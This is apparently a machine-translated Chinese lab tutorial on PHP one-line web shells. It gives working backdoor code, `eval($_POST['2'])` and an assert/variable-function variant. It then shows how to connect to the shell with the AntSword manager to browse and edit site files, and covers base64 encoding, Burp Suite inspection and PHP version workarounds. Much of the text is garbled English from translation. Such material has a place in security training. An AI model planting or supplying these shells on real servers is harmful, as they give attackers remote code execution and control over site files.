Repeat one sentence Trojan horse

start-up Apache service , Write a sentence Trojan horse

Start through the small software Apache service , Create... In the root directory php file 、
Write code in the created file

<?php
eval($_POST['2']);
?>

Then use the Chinese ant sword to test .

First, right-click to add a new data , Enter the file name just written into URL In the address , Then the connection password is set 2. The connection class writing is also changed to base64.

Then click test connection , You can see that the connection is successful in the lower right corner .

Showing that the connection is successful is equivalent to hacking the file path , The content in the website can be seen . And you can see its directory structure , If you click to enter the file, you can also edit .

So let's revise that php Code , Rewrite him as ：

<?php
$_POST['1']($_POST['2']);
?>

And modify the newly added in Chinese ant sword **/127.0.0.1/muma_demo.php Of URL

Through here "1" Submit "eval", This one is submitted ; It's equivalent to what we wrote $_POST[‘1’] Substitute for eval**, But this connection is wrong .

But just use it directly eval When connecting, you can connect , Why can't we replace it like this ？
Here's to say eval The rules of ：eval It's a language constructor , It's not a function , Therefore, it cannot be called by variable functions .

Use assert;assert You can also execute any command ,

This will not succeed , Use burp suite Tools grab bags to check

Found out 2 The value of is directly input PHP Get the string of the function of the file , however assert() Function parameters cannot use strings . Only expressions and functions can be used to execute .
Change the coding method ：

Grab the bag again , You can see that the coding method has become base64, That is, satisfied assert() The function parameter must be a condition of the function .

You can also use 1=assert;2=eval($_post[‘3’]) To try to connect .

In this way, it satisfies assert() The parameter of must be one of the functions and expressions , and eval There are parameters that can be passed in the statement , So the connection is successful .

At the beginning of the visit, I kept making mistakes , Even with 1=assert&2 Also, the display result is null , It will also show

The solution is to modify my php edition , At first, I used the experimental version 7. 3.4 Of , The back is changed to 5.3.29 The version of is ok ; because php7.2 In the above version assert() Also as a language structure , Not a function , So become and eval The sentence is the same , You can't use variable functions to construct .